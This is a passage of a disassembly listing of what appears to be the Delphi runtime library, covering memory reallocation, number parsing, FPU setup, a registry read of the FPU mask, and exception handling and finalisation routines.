; ---------------------------------------------------------------------------
loc_40234E: ; CODE XREF: sub_402198+193�j
; sub_402198+1AB�j
xor eax, eax
jmp short loc_40236B
; ---------------------------------------------------------------------------
loc_402352: ; CODE XREF: sub_402198+68�j
; sub_402198+82�j ...
mov eax, esi
sub eax, edi
add ds:dword_4055A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
loc_40236B: ; CODE XREF: sub_402198+33�j
; sub_402198+12C�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402198 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402374 proc near ; DATA XREF: DATA:0040402C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
cmp ds:byte_4055AC, 0
jnz short loc_40239B
call sub_401778
test al, al
jnz short loc_40239B
xor eax, eax
mov [ebp+var_4], eax
jmp loc_40242C
; ---------------------------------------------------------------------------
loc_40239B: ; CODE XREF: sub_402374+12�j
; sub_402374+1B�j
xor edx, edx
push ebp
push offset loc_402425
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_405035, 0
jz short loc_4023BC
push offset dword_4055B4
call sub_4010D4 ; RtlEnterCriticalSection
loc_4023BC: ; CODE XREF: sub_402374+3C�j
mov edx, esi
mov eax, ebx
call sub_402198
test al, al
jz short loc_4023CE
mov [ebp+var_4], ebx
jmp short loc_402404
; ---------------------------------------------------------------------------
loc_4023CE: ; CODE XREF: sub_402374+53�j
mov eax, esi
call sub_401E64
mov edi, eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_4023EC
mov eax, esi
loc_4023EC: ; CODE XREF: sub_402374+74�j
test edi, edi
jz short loc_402401
mov edx, edi
mov ecx, ebx
xchg eax, ecx
call sub_4024EC
mov eax, ebx
call sub_401FF4
loc_402401: ; CODE XREF: sub_402374+7A�j
mov [ebp+var_4], edi
loc_402404: ; CODE XREF: sub_402374+58�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40242C
loc_402411: ; CODE XREF: sub_402374+B6�j
cmp ds:byte_405035, 0
jz short locret_402424
push offset dword_4055B4
call sub_4010DC ; RtlLeaveCriticalSection
locret_402424: ; CODE XREF: sub_402374+A4�j
retn
; ---------------------------------------------------------------------------
loc_402425: ; DATA XREF: sub_402374+2A�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_402411
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_402374+22�j
; DATA XREF: sub_402374+98�o
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_402374 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402438 proc near ; CODE XREF: sub_402F10+C�p
push ebx
test eax, eax
jle short loc_402452
call ds:off_404024
mov ebx, eax
test ebx, ebx
jnz short loc_402454
mov al, 1
call sub_4024D0
; ---------------------------------------------------------------------------
jmp short loc_402454
; ---------------------------------------------------------------------------
loc_402452: ; CODE XREF: sub_402438+3�j
xor ebx, ebx
loc_402454: ; CODE XREF: sub_402438+F�j
; sub_402438+18�j
mov eax, ebx
pop ebx
retn
sub_402438 endp
; =============== S U B R O U T I N E =======================================
sub_402458 proc near ; CODE XREF: sub_402EEC+1C�p
push ebx
test eax, eax
jz short loc_402472
call ds:off_404028
mov ebx, eax
test ebx, ebx
jz short loc_402474
mov al, 2
call sub_4024D0
; ---------------------------------------------------------------------------
jmp short loc_402474
; ---------------------------------------------------------------------------
loc_402472: ; CODE XREF: sub_402458+3�j
xor ebx, ebx
loc_402474: ; CODE XREF: sub_402458+F�j
; sub_402458+18�j
mov eax, ebx
pop ebx
retn
sub_402458 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402478 proc near ; CODE XREF: sub_402484+42�p
; CODE:00402AF3�p
mov ds:dword_404004, edx
call sub_402ED4
sub_402478 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402484 proc near ; CODE XREF: sub_4024D0+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_405008, 0
jz short loc_4024A0
mov edx, esi
mov eax, ebx
call ds:dword_405008
loc_4024A0: ; CODE XREF: sub_402484+10�j
test bl, bl
jnz short loc_4024B1
call sub_40327C
mov ebx, [eax+4]
jmp short loc_4024C0
; ---------------------------------------------------------------------------
loc_4024B1: ; CODE XREF: sub_402484+1E�j
cmp bl, 18h
ja short loc_4024C0
xor eax, eax
mov al, bl
mov bl, ds:byte_404030[eax]
loc_4024C0: ; CODE XREF: sub_402484+2B�j
; sub_402484+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_402478
sub_402484 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4024D0 proc near ; CODE XREF: sub_402438+13�p
; sub_402458+13�p ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_402484
sub_4024D0 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4024DC proc near ; CODE XREF: sub_40252C+38�p
; sub_40252C+4C�p
push ebx
mov ebx, eax
call sub_40327C
mov [eax+4], ebx
pop ebx
retn
sub_4024DC endp
; =============== S U B R O U T I N E =======================================
sub_4024EC proc near ; CODE XREF: sub_402374+81�p
; sub_402F3C+1C�p
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_40250B
jz short loc_402529
sar ecx, 2
js short loc_402529
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40250B: ; CODE XREF: sub_4024EC+A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
sar ecx, 2
js short loc_402529
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_402529: ; CODE XREF: sub_4024EC+C�j
; sub_4024EC+11�j ...
pop edi
pop esi
retn
sub_4024EC endp
; =============== S U B R O U T I N E =======================================
sub_40252C proc near ; CODE XREF: CODE:004030FA�p
; CODE:00403104�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_40256B
cmp ax, 0D7B3h
ja short loc_40256B
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_402553
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_402553: ; CODE XREF: sub_40252C+1E�j
test esi, esi
jnz short loc_40255E
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_40255E: ; CODE XREF: sub_40252C+29�j
test esi, esi
jz short loc_40257D
mov eax, esi
call sub_4024DC
jmp short loc_40257D
; ---------------------------------------------------------------------------
loc_40256B: ; CODE XREF: sub_40252C+E�j
; sub_40252C+14�j
cmp ebx, offset dword_405038
jz short loc_40257D
mov eax, 67h
call sub_4024DC
loc_40257D: ; CODE XREF: sub_40252C+34�j
; sub_40252C+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_40252C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402584 proc near ; CODE XREF: sub_403068+41�p
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_4025FA
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_402597: ; CODE XREF: sub_402584+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_402597
mov ch, 0
cmp bl, 2Dh
jz short loc_402608
cmp bl, 2Bh
jz short loc_40260A
loc_4025AB: ; CODE XREF: sub_402584+89�j
cmp bl, 24h
jz short loc_40260F
cmp bl, 78h
jz short loc_40260F
cmp bl, 58h
jz short loc_40260F
cmp bl, 30h
jnz short loc_4025D2
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_40260F
cmp bl, 58h
jz short loc_40260F
test bl, bl
jz short loc_4025F0
jmp short loc_4025D6
; ---------------------------------------------------------------------------
loc_4025D2: ; CODE XREF: sub_402584+39�j
test bl, bl
jz short loc_402603
loc_4025D6: ; CODE XREF: sub_402584+4C�j
; sub_402584+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_402603
cmp eax, edi
ja short loc_402603
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_4025D6
loc_4025F0: ; CODE XREF: sub_402584+4A�j
dec ch
jz short loc_4025FD
test eax, eax
jge short loc_40264C
jmp short loc_402603
; ---------------------------------------------------------------------------
loc_4025FA: ; CODE XREF: sub_402584+8�j
; sub_402584+95�j
inc esi
jmp short loc_402603
; ---------------------------------------------------------------------------
loc_4025FD: ; CODE XREF: sub_402584+6E�j
neg eax
jle short loc_40264C
js short loc_40264C
loc_402603: ; CODE XREF: sub_402584+50�j
; sub_402584+58�j ...
pop ebx
sub esi, ebx
jmp short loc_40264F
; ---------------------------------------------------------------------------
loc_402608: ; CODE XREF: sub_402584+20�j
inc ch
loc_40260A: ; CODE XREF: sub_402584+25�j
mov bl, [esi]
inc esi
jmp short loc_4025AB
; ---------------------------------------------------------------------------
loc_40260F: ; CODE XREF: sub_402584+2A�j
; sub_402584+2F�j ...
mov edi, 0FFFFFFFh
mov bl, [esi]
inc esi
test bl, bl
jz short loc_4025FA
loc_40261B: ; CODE XREF: sub_402584+C0�j
cmp bl, 61h
jb short loc_402623
sub bl, 20h
loc_402623: ; CODE XREF: sub_402584+9A�j
sub bl, 30h
cmp bl, 9
jbe short loc_402636
sub bl, 11h
cmp bl, 5
ja short loc_402603
add bl, 0Ah
loc_402636: ; CODE XREF: sub_402584+A5�j
cmp eax, edi
ja short loc_402603
shl eax, 4
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_40261B
dec ch
jnz short loc_40264C
neg eax
loc_40264C: ; CODE XREF: sub_402584+72�j
; sub_402584+7B�j ...
pop ecx
xor esi, esi
loc_40264F: ; CODE XREF: sub_402584+82�j
mov [edx], esi
pop edi
pop esi
pop ebx
retn
sub_402584 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402658 proc near ; CODE XREF: sub_402660+5�p
; sub_402660+11�p
jmp ds:dword_4060D0
sub_402658 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402660 proc near ; CODE XREF: CODE:00403169�p
push ebx
xor ebx, ebx
push 0
call sub_402658 ; GetKeyboardType
cmp eax, 7
jnz short loc_40268B
push 1
call sub_402658 ; GetKeyboardType
and eax, 0FF00h
cmp eax, 0D00h
jz short loc_402689
cmp eax, 400h
jnz short loc_40268B
loc_402689: ; CODE XREF: sub_402660+20�j
mov bl, 1
loc_40268B: ; CODE XREF: sub_402660+D�j
; sub_402660+27�j
mov eax, ebx
pop ebx
retn
sub_402660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402690 proc near ; CODE XREF: CODE:00403172�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
movzx eax, ds:word_40400C
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push 1
push 0
push offset aSoftwareBorlan ; "SOFTWARE\\Borland\\Delphi\\RTL"
push 80000002h
call sub_401068 ; RegOpenKeyExA
test eax, eax
jnz short loc_402708
xor eax, eax
push ebp
push offset loc_402701
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 4
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
push offset aFpumaskvalue ; "FPUMaskValue"
mov eax, [ebp+var_4]
push eax
call sub_401070 ; RegQueryValueExA
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402708
loc_4026F7: ; CODE XREF: sub_402690+76�j
mov eax, [ebp+var_4]
push eax
call sub_401060 ; RegCloseKey
retn
; ---------------------------------------------------------------------------
loc_402701: ; DATA XREF: sub_402690+2E�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_4026F7
; ---------------------------------------------------------------------------
loc_402708: ; CODE XREF: sub_402690+29�j
; DATA XREF: sub_402690+62�o
mov ax, ds:word_40400C
and ax, 0FFC0h
mov dx, word ptr [ebp+var_8]
and dx, 3Fh
or ax, dx
mov ds:word_40400C, ax
mov esp, ebp
pop ebp
retn
sub_402690 endp
; ---------------------------------------------------------------------------
align 4
aSoftwareBorlan db 'SOFTWARE\Borland\Delphi\RTL',0 ; DATA XREF: sub_402690+18�o
aFpumaskvalue db 'FPUMaskValue',0 ; DATA XREF: sub_402690+4C�o
align 4
; =============== S U B R O U T I N E =======================================
sub_402754 proc near ; CODE XREF: sub_402BE4-368�p
; CODE:00402B2A�p ...
fninit
wait
fldcw ds:word_40400C
retn
sub_402754 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402760 proc near ; CODE XREF: CODE:0040297B�j
; sub_4029C0+30�p ...
test eax, eax
jz short locret_40276B
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx-4]
locret_40276B: ; CODE XREF: sub_402760+2�j
retn
sub_402760 endp
; =============== S U B R O U T I N E =======================================
sub_40276C proc near ; CODE XREF: sub_4029C0+35�p
cmp ds:byte_404010, 1
jbe short locret_402786
push 0
push 0
push 0
push 0EEDFADFh
call ds:off_405010
locret_402786: ; CODE XREF: sub_40276C+7�j
retn
sub_40276C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402788 proc near ; CODE XREF: sub_402BE4-33B�p
cmp ds:byte_404010, 0
jz short locret_4027A8
push eax
push eax
push edx
push esp
push 2
push 0
push 0EEDFAE4h
call ds:off_405010
add esp, 8
pop eax
locret_4027A8: ; CODE XREF: sub_402788+7�j
retn
sub_402788 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4027C4
loc_4027AC: ; CODE XREF: sub_4027C4+B�j
push esp
push 1
push 0
push 0EEDFAE0h
call ds:off_405010
add esp, 4
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_4027C4
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027C4 proc near ; CODE XREF: sub_402BE4-28B�p
; FUNCTION CHUNK AT 004027AC SIZE 00000015 BYTES
cmp ds:byte_404010, 1
jbe short locret_4027D4
push eax
push ebx
jmp loc_4027AC
; ---------------------------------------------------------------------------
locret_4027D4: ; CODE XREF: sub_4027C4+7�j
retn
sub_4027C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027D8 proc near ; CODE XREF: sub_4027F8+C�p
test ecx, ecx
jz short locret_4027F5
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_4027F0
cmp byte ptr [ecx], 0EBh
jnz short locret_4027F5
movsx eax, al
inc ecx
inc ecx
jmp short loc_4027F3
; ---------------------------------------------------------------------------
loc_4027F0: ; CODE XREF: sub_4027D8+A�j
add ecx, 5
loc_4027F3: ; CODE XREF: sub_4027D8+16�j
add ecx, eax
locret_4027F5: ; CODE XREF: sub_4027D8+2�j
; sub_4027D8+F�j
retn
sub_4027D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027F8 proc near ; CODE XREF: sub_401778+1235�p
cmp ds:byte_404010, 1
jbe short locret_40281E
push eax
push edx
push ecx
call sub_4027D8
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:off_405010
pop ecx
pop ecx
pop edx
pop eax
locret_40281E: ; CODE XREF: sub_4027F8+7�j
retn
sub_4027F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_402A14+28�p
cmp ds:byte_404010, 1
jbe short locret_40283B
push edx
push esp
push 1
push 0
push 0EEDFAE2h
call ds:off_405010
pop edx
locret_40283B: ; CODE XREF: sub_402820+7�j
retn
sub_402820 endp
; =============== S U B R O U T I N E =======================================
sub_40283C proc near ; CODE XREF: CODE:loc_402B71�p
push eax
push edx
cmp ds:byte_404010, 1
jbe short loc_402857
push esp
push 2
push 0
push 0EEDFAE3h
call ds:off_405010
loc_402857: ; CODE XREF: sub_40283C+9�j
pop edx
pop eax
retn
sub_40283C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_402BE4
loc_40285C: ; CODE XREF: sub_402BE4:loc_402C2A�j
; sub_402C44:loc_402C8A�j ...
mov eax, [esp-4+arg_0]
test dword ptr [eax+4], 6
jnz loc_402980
cmp dword ptr [eax], 0EEDFADEh
mov edx, [eax+18h]
mov ecx, [eax+14h]
jz short loc_4028E9
cld
call sub_402754
mov edx, ds:dword_40500C
test edx, edx
jz loc_402980
call edx
test eax, eax
jz loc_402980
mov edx, [esp-4+arg_8]
mov ecx, [esp-4+arg_0]
cmp dword ptr [ecx], 0EEFFACEh
jz short loc_4028E0
call sub_402788
cmp ds:byte_404014, 0
jbe short loc_4028E0
cmp ds:byte_404010, 0
ja short loc_4028E0
lea ecx, [esp-4+arg_0]
push eax
push ecx
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop eax
jz loc_402980
mov edx, eax
mov eax, [esp+4]
mov ecx, [eax+0Ch]
jmp short loc_402910
; ---------------------------------------------------------------------------
loc_4028E0: ; CODE XREF: sub_402BE4-33D�j
; sub_402BE4-32F�j ...
mov edx, eax
mov eax, [esp-4+arg_0]
mov ecx, [eax+0Ch]
loc_4028E9: ; CODE XREF: sub_402BE4-36B�j
cmp ds:byte_404014, 1
jbe short loc_402910
cmp ds:byte_404010, 0
ja short loc_402910
push eax
lea eax, [esp+arg_0]
push edx
push ecx
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
pop ecx
pop edx
pop eax
jz short loc_402980
loc_402910: ; CODE XREF: sub_402BE4-306�j
; sub_402BE4-2F4�j ...
or dword ptr [eax+4], 2
push ebx
xor ebx, ebx
push esi
push edi
push ebp
mov ebx, fs:[ebx]
push ebx
push eax
push edx
push ecx
mov edx, [esp+20h+arg_0]
push 0
push eax
push offset loc_402934
push edx
call ds:off_405014
loc_402934: ; DATA XREF: sub_402BE4-2BC�o
mov edi, [esp+30h+var_8]
call sub_40327C
push dword ptr [eax+0]
mov [eax+0], esp
mov ebp, [edi+8]
mov ebx, [edi+4]
mov dword ptr [edi+4], offset sub_402960
add ebx, 5
call sub_4027C4
jmp ebx
; END OF FUNCTION CHUNK FOR sub_402BE4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402960 proc near ; DATA XREF: sub_402BE4-295�o
jmp loc_402988
sub_402960 endp
; ---------------------------------------------------------------------------
call sub_40327C
mov ecx, [eax+0]
mov edx, [ecx]
mov [eax+0], edx
mov eax, [ecx+8]
jmp sub_402760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402BE4
loc_402980: ; CODE XREF: sub_402BE4-37D�j
; sub_402BE4-35B�j ...
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_402BE4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_401778
loc_402988: ; CODE XREF: sub_401778:loc_40182E�j
; sub_40183C:loc_401912�j ...
mov eax, [esp+4]
mov edx, [esp+arg_0]
test dword ptr [eax+4], 6
jz short loc_4029B8
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_4029B8
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_4027F8
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_4029B8: ; CODE XREF: sub_401778+121F�j
; DATA XREF: sub_401778+1224�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_401778
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4029C0 proc near ; CODE XREF: sub_402BE4+50�p
; sub_402C44+50�p
arg_2C = dword ptr 30h
mov eax, [esp+arg_2C]
mov dword ptr [eax+4], offset loc_402A0B
call sub_40327C
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+0Ch]
and dword ptr [eax+4], 0FFFFFFFDh
cmp dword ptr [eax], 0EEDFADEh
jz short loc_4029FA
mov eax, [edx+8]
call sub_402760
call sub_40276C
loc_4029FA: ; CODE XREF: sub_4029C0+2B�j
xor eax, eax
add esp, 14h
mov edx, fs:[eax]
pop ecx
mov edx, [edx]
mov [ecx], edx
pop ebp
pop edi
pop esi
pop ebx
loc_402A0B: ; DATA XREF: sub_4029C0+4�o
mov eax, 1
retn
sub_4029C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A14 proc near ; CODE XREF: sub_402BE4+55�p
; sub_402C44+55�p ...
arg_2C = dword ptr 30h
call sub_40327C
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_402760
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_402820
jmp edx
sub_402A14 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402A44 proc near ; CODE XREF: sub_401E64+F5�p
; sub_401E64+14A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_402A44 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_402A5C: ; CODE XREF: CODE:00402B5C�j
; CODE:00402B68�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_402A97
jz short loc_402AC9
cmp eax, 0C000008Eh
jg short loc_402A89
jz short loc_402ACD
sub eax, 0C0000005h
jz short loc_402AD9
sub eax, 87h
jz short loc_402AC1
dec eax
jz short loc_402AD5
jmp short loc_402AE9
; ---------------------------------------------------------------------------
loc_402A89: ; CODE XREF: CODE:00402A72�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_402AC9
jz short loc_402AC5
jmp short loc_402AE9
; ---------------------------------------------------------------------------
loc_402A97: ; CODE XREF: CODE:00402A69�j
cmp eax, 0C0000096h
jg short loc_402AAF
jz short loc_402ADD
sub eax, 0C0000093h
jz short loc_402AD5
dec eax
jz short loc_402ABD
dec eax
jz short loc_402AD1
jmp short loc_402AE9
; ---------------------------------------------------------------------------
loc_402AAF: ; CODE XREF: CODE:00402A9C�j
sub eax, 0C00000FDh
jz short loc_402AE5
sub eax, 3Dh
jz short loc_402AE1
jmp short loc_402AE9
; ---------------------------------------------------------------------------
loc_402ABD: ; CODE XREF: CODE:00402AA8�j
mov al, 0C8h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AC1: ; CODE XREF: CODE:00402A82�j
mov al, 0C9h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AC5: ; CODE XREF: CODE:00402A93�j
mov al, 0CDh
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AC9: ; CODE XREF: CODE:00402A6B�j
; CODE:00402A91�j
mov al, 0CFh
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402ACD: ; CODE XREF: CODE:00402A74�j
mov al, 0C8h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AD1: ; CODE XREF: CODE:00402AAB�j
mov al, 0D7h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AD5: ; CODE XREF: CODE:00402A85�j
; CODE:00402AA5�j
mov al, 0CEh
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AD9: ; CODE XREF: CODE:00402A7B�j
mov al, 0D8h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402ADD: ; CODE XREF: CODE:00402A9E�j
mov al, 0DAh
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AE1: ; CODE XREF: CODE:00402AB9�j
mov al, 0D9h
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AE5: ; CODE XREF: CODE:00402AB4�j
mov al, 0CAh
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402AE9: ; CODE XREF: CODE:00402A87�j
; CODE:00402A95�j ...
mov al, 0FFh
loc_402AEB: ; CODE XREF: CODE:00402ABF�j
; CODE:00402AC3�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_402478
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402AFC: ; DATA XREF: sub_402B9C+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_402B96
cmp ds:byte_404010, 0
ja short loc_402B25
lea eax, [esp+4]
push eax
call sub_401018 ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_402B96
loc_402B25: ; CODE XREF: CODE:00402B14�j
mov eax, [esp+4]
cld
call sub_402754
mov edx, [esp+8]
push 0
push eax
push offset loc_402B42
push edx
call ds:off_405014
loc_402B42: ; DATA XREF: CODE:00402B36�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_402B71
mov edx, ds:dword_40500C
test edx, edx
jz loc_402A5C
mov eax, ebx
call edx
test eax, eax
jz loc_402A5C
mov edx, [ebx+0Ch]
loc_402B71: ; CODE XREF: CODE:00402B52�j
call sub_40283C
mov ecx, ds:dword_405004
test ecx, ecx
jz short loc_402B82
call ecx
loc_402B82: ; CODE XREF: CODE:00402B7E�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_402EE0
; ---------------------------------------------------------------------------
loc_402B96: ; CODE XREF: CODE:00402B07�j
; CODE:00402B23�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B9C proc near ; CODE XREF: sub_402CA4+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_402AFC
mov [eax+8], ebp
mov ds:dword_405624, eax
retn
sub_402B9C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402BBC proc near ; CODE XREF: sub_402DFC:loc_402E86�p
xor edx, edx
mov eax, ds:dword_405624
test eax, eax
jz short locret_402BE3
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_402BD6
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_402BD4: ; CODE XREF: sub_402BBC+21�j
mov ecx, [ecx]
loc_402BD6: ; CODE XREF: sub_402BBC+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_402BE3
cmp [ecx], eax
jnz short loc_402BD4
mov eax, [eax]
mov [ecx], eax
locret_402BE3: ; CODE XREF: sub_402BBC+9�j
; sub_402BBC+1D�j
retn
sub_402BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BE4 proc near ; CODE XREF: sub_402BE4+4B�p
; sub_402C44+4B�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040285C SIZE 00000104 BYTES
; FUNCTION CHUNK AT 00402980 SIZE 00000006 BYTES
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, offset dword_405620
mov eax, [edi+8]
test eax, eax
jz short loc_402C3E
mov ebx, [edi+0Ch]
mov esi, [eax+4]
xor edx, edx
push ebp
push offset loc_402C2A
push dword ptr fs:[edx]
mov fs:[edx], esp
test ebx, ebx
jle short loc_402C20
loc_402C0E: ; CODE XREF: sub_402BE4+3A�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_402C1C
call eax
loc_402C1C: ; CODE XREF: sub_402BE4+34�j
test ebx, ebx
jg short loc_402C0E
loc_402C20: ; CODE XREF: sub_402BE4+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402C3E
; ---------------------------------------------------------------------------
loc_402C2A: ; DATA XREF: sub_402BE4+1B�o
jmp loc_40285C
; ---------------------------------------------------------------------------
call sub_402BE4
call sub_4029C0
call sub_402A14
loc_402C3E: ; CODE XREF: sub_402BE4+10�j
; sub_402BE4+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402BE4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C44 proc near ; CODE XREF: sub_402CA4+3A�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, ds:off_405628
test eax, eax
jz short loc_402C9E
mov esi, [eax]
xor ebx, ebx
mov edi, [eax+4]
xor edx, edx
push ebp
push offset loc_402C8A
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp esi, ebx
jle short loc_402C80
loc_402C6C: ; CODE XREF: sub_402C44+3A�j
mov eax, [edi+ebx*8]
inc ebx
mov ds:dword_40562C, ebx
test eax, eax
jz short loc_402C7C
call eax
